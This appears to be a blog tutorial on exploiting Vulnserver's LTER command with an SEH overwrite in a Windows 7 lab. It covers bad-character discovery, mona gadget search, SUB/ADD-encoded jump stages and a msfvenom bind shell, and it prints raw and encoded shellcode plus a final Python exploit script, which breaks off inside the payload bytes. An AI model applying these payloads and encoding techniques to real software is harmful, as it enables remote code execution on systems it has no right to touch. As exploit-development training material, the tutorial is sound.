[ExpDev] Vulnserver — Part 7
Vulnserver — Part 7 (LTER — SEH Overwrite + Restricted Character Set)
This will be the 7th vulnserver exploit series. We will be fuzzing and exploiting the vulnerable command LTER this time. We will identify a crash point with an SEH overwrite and circumvent the restricted character sets to introduce our encoded shellcode to gain shell access.
Lab Environment
- OS: Windows 7 (x86)
- Debugger: OllyDbg, WinDbg (mona.py)
- Fuzzer: boofuzz
- Target: Vulnserver — LTER command (SEH Overwrite + Restricted Characters)
*Detailed lab setup guide can be found here
- “[ExpDev] Vulnserver — Part 1.”
Initial Recon
Let’s quickly check what the LTER command does.
Fuzzing
Since we have the previously created fuzzing script from the Part 1, we can just make small changes in that script for our fuzzer for the LTER command.
As usual, let’s attach the vulnserver with the OllyDbg. Then, run our fuzzer.
### Running the Fuzzer
C:\Users\bigb0ss\Desktop\scripts\LTER>python fuzz_lter.py
A few seconds after running our fuzzing script, the vulnserver was crashed. From the crash in OllyDbg, we can clearly see that the LTER command and the certain number of the characters caused the crash.
Just confirm that the value overwrote the SEH handler is the ASCII value that was sent from the fuzzer.
>>> "p_.?".encode('hex')
'705f2e3f'
Fuzzing Analysis
From the crash on OllyDbg, it was about 4000 characters caused the crash the LTER command. We will skip the Boofuzz DB File analysis this time.
Exploit
Initial Crash PoC
Let’s create a python script to reproduce the crash.
Start the vulnserver and attach it to OllyDbg. Then, run the crash_lter.py script. We successfully reproduced the crash with our PoC script by overwriting the SEH handler with “A”s.
Checking for Bad/Restricted Characters
From the initial fuzzing, I was able to notice that some of the character sets were not allowed to the LTER command. Let’s try to identify which character sets are allowed vs not.
To do this, I created a simply python script to generate all hex characters. (allHexChar.py)
Using the generated character set, let’s update our PoC to determine if there are any bad/restricted characters for LTER command.
Once we run the above script, we can examine for allowed characters. And it found that hex characters from \x01 to \x7F are only allowed for the LTER command.
Finding Offset
Next, we need to find the offset to control the SEH handler at the crash time. Since there are so many bad characters, using the pattern_create might be a bit difficult in this situation. There are a couple of different ways to accomplish this, but one of the easiest ways to do this is a manual approach. (I covered this in Vulnserver — Part 5 (HTER — EIP Overwrite) in details.)
And we can find the offset at 3520 to control the SEH handler.
Now, we are all set to control the SEH at the crash time.
Finding POP-POP-RET
For a typical SEH overwrite exploit, we need to find the POP POP RET instruction gadgets. We will use mona.py’s seh command to search for POP POP RET within the vulnserver application’s dlls. First, attach the vulnserver to WinDbg and run the following commands:
### Mona.py Finding "POP POP RET"
!py mona seh -cm safeseh=off -cp nonull,ascii -o -cpb '\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
* We can use '-cpb' flag to specify which characters are restricted/bad
...snip...
[+] Results :
0x6250160a | 0x6250160a : pop esi # pop ebp # ret | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\bigb0ss\Desktop\software\vulnserver\essfunc.dll)
0x6250172b | 0x6250172b : pop edi # pop ebp # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\bigb0ss\Desktop\software\vulnserver\essfunc.dll)
0x6250195e | 0x6250195e : pop edi # pop ebp # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\bigb0ss\Desktop\software\vulnserver\essfunc.dll)
0x6250120b | 0x6250120b : pop ecx # pop ecx # ret | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\bigb0ss\Desktop\software\vulnserver\essfunc.dll)
Found a total of 4 pointers
Let’s use one of the POP POP RET gadgets found. We will be using the 0x6250120b for our example. Update the PoC script.
And once again attach the vulnserver to OllyDbg and set a breakpoint at the 0x6250120b (SEH) address.
When we run the PoC script, we indeed hit the POP POP RET address, the breakpoint. Once we allow the exception handler, we will reach to our controlled buffer of 4 bytes.
#1 Stage Shellcode — Conditional JMP (nSEH)
With the 4 bytes of the space, we want to jump to the nSEH (next SEH) position. As you may already notice that, we cannot use a normal short jump like \xEB\x80 since \xEB is a bad character for this command. We need to be a bit creative here.
We can leverage a conditional jump using a Zero Flags (ZF).
JZ (= Jump if zero) and JNZ (= Jump if not zero) instructions are only taking 1 byte each \x74 and \x75 respectively. And what we can do is since we won’t know if our register will have ZF as 0 or not at the location after the exception handler gets proceeded, we can put those two conditional jump instructions one after the other; therefore, no matter what (ZF == 0 or ZF != 0) the jump will happen.
### Conditional Jump
\x75\x08 ; JNZ SHORT [+0x10] = Jump if ZF is not 0
\x74\x06 ; JZ SHORT [+0x8] = Jump if ZF is 0
This conditional jump will successfully redirect our execution to nSEH location where 0x016EFFCE in our example. We will have about 50 bytes of the new breathing space.
- Updated 1st Stage Shellcode PoC Script: 1st-stage_lter.py
#2 Stage Shellcode — Encoded Short JMP
Since we have only 50-byte buffer, we are more than likely to introduce another jump instruction to relocate our pointer to a larger area. But we are still restricted with character set, we need to do a Short JMP (\xEB\x80) first and maybe a longer JMP afterward.
We will be using the SUB encode for this to circumvent the character restrictions. First, we need to adjust our current ESP register to point to where our encoded shellcode will be decoded.
### ESP Alignment (Short JMP)
\x54 # PUSH ESP
\x58 # POP EAX
\x66\x05\x59\x13 # ADD AX,0x1359 (018BFFFD — 016EECA4 = 0x1359)
\x50 # PUSH EAX
\x5C # POP ESP
You might be wondering why we are adding 0x1359 to AX is because our current ESP is equal to 0x18BFFFD, and we want to align our ESP to 2 bytes above from the last “C”s (\x43) so that we can put our decoded short JMP (\xEB\x80) there.
Next, we need to put SUB encoded short JMP (\xEB\x80) shellcode after the ESP Alignment. It is because, again, the \xEB is one of the bad characters. Explained encoding process is as following:
1) Zero out the EAX
> AND EAX,0x554e4d4a
AND EAX,0x2a313235
1) Adding 2 NOPs to \xEB\x80\x90\x90
> \xEB\x80\x90\x90
2) Covert it to big-endian
> 909080EB
3) Hex mathematics
> 0 - 909080EB = 0xFFFFFFFF - 0x909080EB + 1 = 0x6F6F7F15
4) Convert it to
> 0x16F6F7F15
5) Make the value to 0 using SUB encoding (* w/ ONLY allowed chars)
0x16F6F7F15
sub 0x7F7F7F7F
sub 0x7F7F7F7F
sub 0x50505002
sub 0x20203015
-----------------
0x00000000
### Encoded Short JMP (SUB Encoding)
\x25\x4A\x4D\x4E\x55 # Zero out EAX
\x25\x35\x32\x31\x2A #
\x2D\x7F\x7F\x7F\x7F # Carving \xEB\x80\x90\x90
\x2D\x7F\x7F\x7F\x7F #
\x2D\x02\x50\x50\x50 #
\x2D\x15\x30\x20\x20 #
\x50 # PUSH EAX
Once we step over the shellcode, we can see that the Short JMP (\xEB\x80) is now successfully decoded in our execution path.
Once we follow through the Short JMP, we will successfully gain about 67-byte buffer to play with.
- Updated 2nd Stage Shellcode PoC Script: 2nd-stage_lter.py
#3 Stage Shellcode — Long JMP
Unfortunately, we still do not have enough space to place our payloads such as a bind shell. With this newly obtained 67-byte buffer, we will introduce a Long JMP to circumvent the space restrictions this time. Steps will be very similar to the #2nd Stage Shellcode (Short JMP).
First, let’s align the ESP again to point the ESP to the bottom of the buffer where our decoded Long JMP will be placed on.
### ESP Alignment (Long JMP)
\x54 # PUSH ESP
\x58 # POP EAX
\x2C\x38 # ADD AL,0x38 (0187FFF9 — 0187FFC1 = 0x39)
\x50 # PUSH EAX
\x5C # POP ESP
Next, we want to place our Long JMP shellcode. Since we have about 3000+ empty space above our current location, so we want to redirect our pointer to the very beginning of the “A”s. We will be using PUSH ESP → POP EBX → subtract necessary bytes → CALL EBX.
### Long JMP (Shellcode)
\x54 # PUSH ESP
\x5B # POP EBX
\x81\xEB\xB9\x0D\x00\x00 # SUB EBX, 0xDB9
# (0187FFC1 - 0187F208 = 0xDB9)
\xFF\xD3 # CALL EBX
As we can see, the first 2 bytes, \x54\x5B, are allowed characters, but rest of them need to be encoded. We will be using the SUB/ADD Encoding technique this time to bypass the restricted character set.
1) Value to Encode
\x81\xEB\xB9\x0D -(big-endian)-> 0DB9EB81
\x00\x00\xFF\xD3 -(big-endian)-> d3ff0000
2) SUB Encoding (d3ff0000)
0 - d3ff0000 = 0xFFFFFFFF- d3ff0000 + 1 = 2C010000
0x12C010000
sub eax, 7F7F7F7F = AC818081
sub eax, 7F7F7F7F = 2D020102
sub eax, 2D020102 = 00000000
push eax
3) ADD Encoding (0DB9EB81)
add eax, 07657641 = 07657641
add eax, 06547540 = 0db9eb81
push eax
### Encoded Long JMP
\x54 # PUSH ESP
\x5B # POP EBX
\x25\x4A\x4D\x4E\x55 # Zero out EAX
\x25\x35\x32\x31\x2A #
\x2D\x7F\x7F\x7F\x7F # Carving \x00\x00\xFF\xD3
\x2D\x7F\x7F\x7F\x7F #
\x2D\x02\x01\x02\x2D #
\x50 # PUSH EAX
\x25\x4A\x4D\x4E\x55 # Zero out EAX
\x25\x35\x32\x31\x2A #
\x05\x41\x76\x65\x07 # Carving \x81\xEB\xB9\x0D
\x05\x40\x75\x54\x06 #
\x50 # PUSH EAX
Once we step over through the encoded shellcode, the Long JMP will reform its original state soon enough.
Once we go through the Long JMP, we will indeed hit the beginning of the “A”s where we will have about 3000+ empty space to put our next payload.
- Updated 3rd Stage Shellcode PoC Script: 3rd-stage_lter.py
#4 Stage Shellcode — Bind Shell
We are at the final step to get a bind shell! Before we put the msfvenom bind shell, we again need to align our ESP pointing to the bottom of the “A”s.
### ESP Alignment (Bind Shell)
\x54 # PUSH ESP
\x58 # POP EAX
\x2C\x3D # ADD AL,0x3D (0180FFB5 — 0180ff78 = 0x39)
\x50 # PUSH EAX
\x5C # POP ESP
Let’s generate a msfvenom bind shell.
msfvenom -p windows/shell_bind_tcp LHOST=127.0.0.1 LPORT=443 BUFFERREGISTER=esp EXITFUNC=thread -f c -b "\x00"
* BUFFERREGISTER: If we specify this flag, it will directly points our payload to the specified register
Our next step would be encoding the shellcode generated by msfvenom. We can definitely do this manually; however, we will be using an awesome encoder called Slink created by @ihack4falafel.
### Encoding with Slink
root@kali:/opt/Slink# python Slink.py
Enter your shellcode: \x89\xe7\xba\x16\xa7\xf4\x0b\x2b\xc9\xb1\x53\x83\xc7\x04\x31\x57\x0e\x03\x41\xa9\x16\xfe\x91\x5d\x54\x01\x69\x9e\x39\x8b\x8c\xaf\x79\xef\xc5\x80\x49\x7b\x8b\x2c\x21\x29\x3f\xa6\x47\xe6\x30\x0f\xed\xd0\x7f\x90\x5e\x20\x1e\x12\x9d\x75\xc0\x2b\x6e\x88\x01\x6b\x93\x61\x53\x24\xdf\xd4\x43\x41\x95\xe4\xe8\x19\x3b\x6d\x0d\xe9\x3a\x5c\x80\x61\x65\x7e\x23\xa5\x1d\x37\x3b\xaa\x18\x81\xb0\x18\xd6\x10\x10\x51\x17\xbe\x5d\x5d\xea\xbe\x9a\x5a\x15\xb5\xd2\x98\xa8\xce\x21\xe2\x76\x5a\xb1\x44\xfc\xfc\x1d\x74\xd1\x9b\xd6\x7a\x9e\xe8\xb0\x9e\x21\x3c\xcb\x9b\xaa\xc3\x1b\x2a\xe8\xe7\xbf\x76\xaa\x86\xe6\xd2\x1d\xb6\xf8\xbc\xc2\x12\x73\x50\x16\x2f\xde\x3d\xdb\x02\xe0\xbd\x73\x14\x93\x8f\xdc\x8e\x3b\xbc\x95\x08\xbc\xc3\x8f\xed\x52\x3a\x30\x0e\x7b\xf9\x64\x5e\x13\x28\x05\x35\xe3\xd5\xd0\xa0\xeb\x70\x8b\xd6\x16\xc2\x7b\x57\xb8\xab\x91\x58\xe7\xcc\x99\xb2\x80\x65\x64\x3d\xaf\xce\xe1\xdb\xc5\x20\xa4\x74\x71\x83\x93\x4c\xe6\xfc\xf1\xe4\x80\xb5\x13\x32\xaf\x45\x36\x14\x27\xce\x55\xa0\x56\xd1\x73\x80\x0f\x46\x09\x41\x62\xf6\x0e\x48\x14\x9b\x9d\x17\xe4\xd2\xbd\x8f\xb3\xb3\x70\xc6\x51\x2e\x2a\x70\x47\xb3\xaa\xbb\xc3\x68\x0f\x45\xca\xfd\x2b\x61\xdc\x3b\xb3\x2d\x88\x93\xe2\xfb\x66\x52\x5d\x4a\xd0\x0c\x32\x04\xb4\xc9\x78\x97\xc2\xd5\x54\x61\x2a\x67\x01\x34\x55\x48\xc5\xb0\x2e\xb4\x75\x3e\xe5\x7c\x95\xdd\x2f\x89\x3e\x78\xba\x30\x23\x7b\x11\x76\x5a\xf8\x93\x07\x99\xe0\xd6\x02\xe5\xa6\x0b\x7f\x76\x43\x2b\x2c\x77\x46
Enter shellcode variable name: stage4
[!] Shellcode size is not divisible by 4
[+] Padding shellcode with 2 NOPS..
[*] Encoding [90904677]..
[+] No bad character found, using default encoder..
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x23\x50\x50" ## add eax, 0x50502333
stage4 += "\x05\x44\x23\x40\x40" ## add eax, 0x40402344
stage4 += "\x50" ## push eax
[*] Encoding [2c2b4376]..
[+] No bad character found, using default encoder..
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x22\x16\x16" ## add eax, 0x16162233
stage4 += "\x05\x43\x21\x15\x16" ## add eax, 0x16152143
stage4 += "\x50" ## push eax
...snip...
Once Slink completes the encoding of our bind shell, place the payload right next to our ESP alignment shellcode.
Final Exploit
### Final_lter.py (Source by bigb0ss)
import socket
import struct
import os
import sys
vuln_command = "LTER _.?"
crash = 4000
offset = 3520
seh = struct.pack("<I", 0x6250120b) # POP POP RET
# 1st Stage Shellcode (Short JMP - nSEH)
stage1 = ""
stage1 += "\x75\x08" # JNZ SHORT [+0x10] = Jump if ZF is not 0
stage1 += "\x74\x06" # JZ SHORT [+0x8] = Jump if ZF is 0
# 2nd Stage Shellcode (Short JMP - Encoded \xEB\x80)
stage2 = ""
stage2 += "\x54" # PUSH ESP
stage2 += "\x58" # POP EAX
stage2 += "\x66\x05\x59\x13" # ADD AX,0x1359
stage2 += "\x50" # PUSH EAX
stage2 += "\x5C" # POP ESP
stage2 += "\x25\x4A\x4D\x4E\x55" # Zero out EAX
stage2 += "\x25\x35\x32\x31\x2A" #
stage2 += "\x2D\x7F\x7F\x7F\x7F" # Carving \xEB\x80
stage2 += "\x2D\x7F\x7F\x7F\x7F" # \x90\x90
stage2 += "\x2D\x02\x50\x50\x50" #
stage2 += "\x2D\x15\x30\x20\x20" #
stage2 += "\x50" # PUSH EAX
# 3rd Stage Shellcode (Long JMP)
stage3 = ""
stage3 += "\x54" # PUSH ESP
stage3 += "\x58" # POP EAX
stage3 += "\x2C\x38" # ADD AL,0x38
stage3 += "\x50" # PUSH EAX
stage3 += "\x5C" # POP ESP
stage3 += "\x54" # PUSH ESP
stage3 += "\x5B" # POP EBX
stage3 += "\x25\x4A\x4D\x4E\x55" # Zero out EAX
stage3 += "\x25\x35\x32\x31\x2A" #
stage3 += "\x2D\x7F\x7F\x7F\x7F" # Carving \x00\x00
stage3 += "\x2D\x7F\x7F\x7F\x7F" # \xFF\xD3
stage3 += "\x2D\x02\x01\x02\x2D" #
stage3 += "\x50" # PUSH EAX
stage3 += "\x25\x4A\x4D\x4E\x55" # Zero out EAX
stage3 += "\x25\x35\x32\x31\x2A" #
stage3 += "\x05\x41\x76\x65\x07" # Carving \x81\xEB
stage3 += "\x05\x40\x75\x54\x06" # \xB9\x0D
stage3 += "\x50" # PUSH EAX
# 4th Stage Shellcode (Bind Shell)
# msfvenom -p windows/shell_bind_tcp LHOST=127.0.0.1 LPORT=443 BUFFERREGISTER=esp EXITFUNC=thread -f c -b "\x00"
stage4 = ""
stage4 += "\x54" # PUSH ESP
stage4 += "\x58" # POP EAX
stage4 += "\x2C\x3D" # ADD AL,0x38
stage4 += "\x50" # PUSH EAX
stage4 += "\x5C" # POP ESP
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x23\x50\x50" ## add eax, 0x50502333
stage4 += "\x05\x44\x23\x40\x40" ## add eax, 0x40402344
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x22\x16\x16" ## add eax, 0x16162233
stage4 += "\x05\x43\x21\x15\x16" ## add eax, 0x16152143
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x63\x53\x16\x47" ## add eax, 0x47165363
stage4 += "\x05\x53\x43\x15\x36" ## add eax, 0x36154353
stage4 += "\x05\x62\x43\x13\x35" ## add eax, 0x35134362
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x55\x70\x73\x01" ## add eax, 0x01737055
stage4 += "\x05\x44\x70\x63\x01" ## add eax, 0x01637044
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x35\x74\x42\x14" ## add eax, 0x14427435
stage4 += "\x05\x34\x64\x42\x13" ## add eax, 0x13426434
stage4 += "\x05\x24\x53\x42\x13" ## add eax, 0x13425324
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x22\x46\x11\x43" ## add eax, 0x43114622
stage4 += "\x05\x12\x35\x22\x33" ## add eax, 0x33223512
stage4 += "\x05\x22\x33\x11\x33" ## add eax, 0x33113322
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x27\x34\x65\x20" ## add eax, 0x20653427
stage4 += "\x05\x17\x44\x55\x10" ## add eax, 0x10554417
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x43\x66\x27\x44" ## add eax, 0x44276643
stage4 += "\x05\x43\x66\x16\x44" ## add eax, 0x44166643
stage4 += "\x05\x42\x44\x25\x34" ## add eax, 0x34254442
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x27\x73\x36" ## add eax, 0x36732733
stage4 += "\x05\x42\x17\x72\x46" ## add eax, 0x46721742
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x63\x60\x17\x62" ## add eax, 0x62176063
stage4 += "\x05\x62\x50\x17\x52" ## add eax, 0x52175062
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x11\x23\x33\x34" ## add eax, 0x34332311
stage4 += "\x05\x12\x22\x33\x24" ## add eax, 0x24332212
stage4 += "\x05\x11\x22\x22\x23" ## add eax, 0x23222211
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x32\x31\x15\x33" ## add eax, 0x33153132
stage4 += "\x05\x22\x30\x15\x34" ## add eax, 0x34153022
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x34\x53\x61\x73" ## add eax, 0x73615334
stage4 += "\x05\x44\x44\x61\x62" ## add eax, 0x62614444
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x21\x02\x62\x65" ## add eax, 0x65620221
stage4 += "\x05\x11\x02\x52\x64" ## add eax, 0x64520211
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x37\x25\x70\x06" ## add eax, 0x06702537
stage4 += "\x05\x26\x25\x60\x06" ## add eax, 0x06602526
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x62\x76\x33\x32" ## add eax, 0x32337662
stage4 += "\x05\x51\x65\x33\x31" ## add eax, 0x31336551
stage4 += "\x05\x62\x53\x33\x22" ## add eax, 0x22335362
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x62\x17\x44\x52" ## add eax, 0x52441762
stage4 += "\x05\x51\x16\x44\x41" ## add eax, 0x41441651
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x16\x31\x76\x26" ## add eax, 0x26763116
stage4 += "\x05\x15\x30\x66\x15" ## add eax, 0x15663015
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x17\x33\x65\x76" ## add eax, 0x76653317
stage4 += "\x05\x16\x23\x54\x66" ## add eax, 0x66542316
stage4 += "\x05\x15\x22\x44\x54" ## add eax, 0x54442215
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x55\x66\x62\x34" ## add eax, 0x34626655
stage4 += "\x05\x55\x55\x61\x34" ## add eax, 0x34615555
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x15\x30\x23\x62" ## add eax, 0x62233015
stage4 += "\x05\x15\x40\x24\x51" ## add eax, 0x51244015
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x30\x63\x31\x17" ## add eax, 0x17316330
stage4 += "\x05\x40\x63\x20\x17" ## add eax, 0x17206340
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x66\x47\x62\x62" ## add eax, 0x62624766
stage4 += "\x05\x56\x46\x52\x52" ## add eax, 0x52524656
stage4 += "\x05\x34\x35\x32\x32" ## add eax, 0x32323534
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x57\x13\x72\x71" ## add eax, 0x71721357
stage4 += "\x05\x46\x04\x72\x61" ## add eax, 0x61720446
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x07\x24\x12\x56" ## add eax, 0x56122407
stage4 += "\x05\x07\x24\x02\x45" ## add eax, 0x45022407
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x14\x31\x32\x73" ## add eax, 0x73323114
stage4 += "\x05\x14\x22\x31\x63" ## add eax, 0x63312214
stage4 += "\x05\x14\x21\x32\x53" ## add eax, 0x53322114
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x42\x41\x17\x33" ## add eax, 0x33174142
stage4 += "\x05\x32\x41\x16\x23" ## add eax, 0x23164132
stage4 += "\x05\x32\x31\x15\x23" ## add eax, 0x23153132
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x50\x33\x71" ## add eax, 0x71335033
stage4 += "\x05\x22\x50\x23\x60" ## add eax, 0x60235022
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x23\x12\x13\x67" ## add eax, 0x67131223
stage4 += "\x05\x13\x02\x14\x67" ## add eax, 0x67140213
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x12\x22\x57\x33" ## add eax, 0x33572212
stage4 += "\x05\x22\x21\x46\x23" ## add eax, 0x23462122
stage4 += "\x05\x12\x22\x45\x22" ## add eax, 0x22452212
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x71\x63\x41\x63" ## add eax, 0x63416371
stage4 += "\x05\x62\x52\x41\x53" ## add eax, 0x53415262
stage4 += "\x05\x51\x62\x31\x32" ## add eax, 0x32316251
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x42\x36\x63\x76" ## add eax, 0x76633642
stage4 += "\x05\x42\x25\x53\x65" ## add eax, 0x65532542
stage4 += "\x05\x42\x24\x63\x54" ## add eax, 0x54632442
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x52\x32\x31\x42" ## add eax, 0x42313252
stage4 += "\x05\x52\x42\x40\x41" ## add eax, 0x41404252
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x71\x76\x63\x10" ## add eax, 0x10637671
